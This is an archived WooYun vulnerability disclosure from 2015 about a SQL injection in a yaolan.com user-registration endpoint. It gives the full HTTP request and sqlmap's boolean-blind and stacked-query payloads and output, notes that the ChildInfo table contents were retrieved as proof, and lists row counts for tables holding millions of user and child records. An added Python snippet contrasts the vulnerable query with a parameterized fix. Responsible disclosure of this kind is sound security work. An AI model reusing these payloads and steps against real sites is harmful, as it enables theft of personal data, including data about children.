WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
Disclosure timeline:
2015-06-07: details sent to the vendor, awaiting vendor handling
2015-06-08: vendor confirmed; details visible to the vendor only
2015-06-18: details opened to core white hats and domain experts
2015-06-28: details opened to ordinary white hats
2015-07-08: details opened to intern white hats
2015-07-23: details opened to the public
[HD] In the name of the team, for personal glory, building network security together. Can this make the front page?
Below are the details of this test. The POST request:
POST /AjaxValidate.aspx HTTP/1.1
Host: user.yaolan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.yaolan.com/RegisterC.aspx?desc=&back_url=http%3a%2f%2fjifen.yaolan.com%2f&immediately=False
Content-Length: 21
Cookie: __yl__test__cookies=1433598576400; _yl_ct=1433598576401; _yl_fr=4; _yl_utmb=1433598446840; _yl_utma=1433598446837.1433598446840; _yl_ft=1433598446836; _yl_nvid=ab316044bfbd5f5e4994d115bc55d823; _yl_pageid=AFfq22,RJrqqu,A7RjMr; Hm_lvt_04a8007d069875ec6d7ac710d65c2b92=1433598448; Hm_lpvt_04a8007d069875ec6d7ac710d65c2b92=1433598577; login_bg_num=1; base_domain_c454868876824458837735f572c90c75=yaolan.com; stay_bg=1; ASP.NET_SessionId=hi5hacmbagucv2ysmqlpymjx; theme=c; __CT_Data=gpv=1&apv_4579_www03=1&cpv_4579_www03=1; WRUID=708976282.1226983508; WRIgnore=true; xnsetting_c454868876824458837735f572c90c75=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22shareAuth%22%3Anull%7D
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

type=1&name=wooyun999
The name parameter is not filtered and is injectable; two databases are reachable (see the screenshot below and the vulnerability proof for the exact parameters).
I checked the data volume of both databases: information_schema holds little, but user_yaolan_com holds a very large amount of data.
Database: user_yaolan_com
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| LoginInfo               | 6740391 |
| ChildInfo               | 6740373 |
| UserBaseInfo            | 6740285 |
| UserExtInfo             | 6740162 |
| MarkInfo                | 6739086 |
| iur_child_birth_based   | 5483060 |
| UserInterestInfo        | 1021602 |
| UserSource              | 1006414 |
| ChildInterestInfo       |  496016 |
| CoinInfo                |  444240 |
| NoDefaultChildInfo      |  258726 |
| UserSignature           |   81646 |
| BoroughList             |    2870 |
| word_filter_reg         |    2809 |
| CityList                |     341 |
| CountryList             |     243 |
| UserVerifyDetail        |     136 |
| UserInterestDetailList  |     107 |
| UserGeekDetail          |      48 |
| ChildInterestDetailList |      40 |
| UserInterestList        |      40 |
| ProvinceList            |      35 |
| ChildInterestList       |      22 |
| TradeList               |      17 |
| GradeList               |      16 |
| ProfessionList          |      12 |
| IncomeList              |       8 |
| EducationList           |       5 |
| GeekList                |       4 |
| VerifyList              |       1 |
+-------------------------+---------+
Contents of the ChildInfo table (shown only to prove the data volume; please excuse it):
I did not go any further into the other tables.
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 270 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=1&name=wooyun999' AND 7721=7721 AND 'VdGz'='VdGz

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: type=1&name=wooyun999';(SELECT * FROM (SELECT(SLEEP(5)))wPGn)#
---
[22:19:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0.11
[22:19:20] [INFO] fetching database names
[22:19:20] [INFO] fetching number of databases
[22:19:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:19:20] [INFO] retrieved: 2
[22:19:21] [INFO] retrieved: information_schema
[22:19:54] [INFO] retrieved: use
[22:20:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
r_yaolan_com
available databases [2]:
[*] information_schema
[*] user_yaolan_com
[22:20:44] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\user.yaolan.com'
[*] shutting down at 22:20:44
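To show why the unfiltered name parameter turns a yes/no "is this name taken?" endpoint into a boolean-blind oracle, here is an added example (not the site's code, which is not on the page): the string-splicing form beside its parameterized form, exercised with the boolean-based blind payload sqlmap reported above. SQLite stands in for the site's MySQL, and the table and users are constructed.

```python
import sqlite3

# Constructed stand-in for the site's user table; the real schema and rows are not on the page.
# "wooyun999" is the test name from the report, inserted so the base query matches one row.
SAMPLE_USERS = ["alice", "bob", "wooyun999"]

# sqlmap's boolean-based blind payload quoted in the report (injected condition true) and a
# constructed twin whose injected condition is false
TRUE_PAYLOAD = "wooyun999' AND 7721=7721 AND 'VdGz'='VdGz"
FALSE_PAYLOAD = "wooyun999' AND 7721=7722 AND 'VdGz'='VdGz"


def make_db():
    """Build an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserBaseInfo (name TEXT)")
    conn.executemany("INSERT INTO UserBaseInfo (name) VALUES (?)",
                     [(u,) for u in SAMPLE_USERS])
    return conn


def name_taken_vulnerable(conn, name):
    """Unfiltered pattern: the name parameter is spliced into the SQL text."""
    sql = "SELECT COUNT(*) FROM UserBaseInfo WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone()[0] > 0


def name_taken_safe(conn, name):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM UserBaseInfo WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone()[0] > 0


def oracle_leaks(check):
    """True when the endpoint's yes/no answer changes with the injected condition,
    i.e. when the endpoint can be used as a boolean-blind oracle."""
    conn = make_db()
    return check(conn, TRUE_PAYLOAD) != check(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    print("spliced query acts as an oracle:", oracle_leaks(name_taken_vulnerable))  # True
    print("parameterized query acts as an oracle:", oracle_leaks(name_taken_safe))  # False
```

With the parameterized query the whole payload is compared as a literal name, so both probes answer "not taken" and the attacker learns nothing about the condition.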
A conscientious vendor with millions of records; is there a gift?
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-06-08 17:20
Vulnerability confirmed, fix in progress. Thanks to the WooYun white hat for the notice.
None yet